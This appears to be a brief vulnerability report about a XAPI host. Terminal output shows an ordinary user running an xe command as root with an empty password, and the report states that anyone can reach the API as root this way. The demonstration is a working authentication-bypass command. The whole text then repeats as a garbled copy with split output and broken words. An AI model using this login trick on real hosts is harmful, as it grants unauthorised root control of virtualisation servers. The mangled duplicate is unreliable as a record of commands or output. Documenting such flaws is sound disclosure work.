<email address hidden>:~$ id uid=1000(xenadmin) gid=1000(xenadmin) groups=1000(xenadmin),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare)
xenadmin@act-sm-071:~$ xe host-is-in-emergency-mode -s localhost -u root -pw "" false
As user xenadmin, I can execute "host-is-in-emergency-mode" against XAPI running on localhost as user root without having to supply root's password.
Effectively anyone can connect to XAPI as root without supplying a password and execute API commands.
<email address hidden>:~$ id 1000(xenadmin) ,4(adm) ,24(cdrom) ,27(sudo) ,30(dip) ,46(plugdev) ,111(lpadmin) ,112(sambashare )
uid=1000(xenadmin) gid=1000(xenadmin) groups=
xenadmin@ act-sm- 071:~$ xe host-is- in-emergency- mode -s localhost -u root -pw ""
false
As user xenadmin, I can execute "host-is- in-emergency- mode" against XAPI running on localhost as user root without having to supply root's password.
Effectively anyone can connect to XAPI as root without supplying a password and execute API commands.